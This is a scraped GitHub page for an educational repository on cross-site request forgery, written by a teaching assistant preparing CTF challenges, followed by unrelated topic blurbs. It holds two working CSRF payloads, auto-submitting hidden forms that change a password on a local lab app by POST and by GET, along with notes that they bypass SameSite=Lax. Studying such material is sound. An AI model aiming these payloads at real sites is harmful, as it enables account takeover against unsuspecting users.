realarcherl / csrf Goto Github PK
View Code? Open in Web Editor NEWlearning CSRF from sratch again to make CTFs for the class I TA (you won't find the challenge CTF here :) )
learning CSRF from sratch again to make CTFs for the class I TA (you won't find the challenge CTF here :) )
This issue arises because of the following reasons:
Payload used:
<html>
<head>
<title>Simple CSRF</title>
</head>
<body>
<!-- sending the request to vulnerable website to change the password -->
<h1>Hacked!</h1>
<form action="http://localhost:3000/changepass" method="POST">
<input type="hidden" name="password" value="archerl" />
<input type="hidden" name="confirm_password" value="archerl" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Hosting the web page using a simple Python server: python3 -m http.server 1337
the response would be:
HTTP/1.1 302 Found
X-Powered-By: Express
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
(8.0) in this case, which is debatable.
The web page comes, loads up for a Second, and then redirects to the /changepass
The password is changed, and we can notice a 302
redirect which means the password was changed.
Notice how the cookies are attached with the request sent from csrf_post.html
Proof that the values were changed: (using Prisma Studio here)
This issue arises because of the following reasons:
Payload used:
<html>
<head>
<title>
CSRF GET
</title>
</head>
<body>
<!-- sending the request to vulnerable website to change the password -->
<h1>Hacked!</h1>
<form action="http://localhost:3000/get/getchangepass" method="GET">
<input type="hidden" name="password" value="1234" />
<input type="hidden" name="confirm_password" value="1234" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Hosting the web page using a simple Python server: python3 -m http.server 1337
the response would be:
HTTP/1.1 302 Found
X-Powered-By: Express
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
(8.0) in this case, which is debatable.
The web page comes, loads up for a Second, and then redirects to the get/getchangepass
The password is changed, and we can notice a 302
redirect which means the password was changed.
Notice how the cookies are attached with the request sent from csrf_get.html
The same exploit would work, even if we use the /defense1/login
which sets the cookies with the property of SameSite=Lax
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.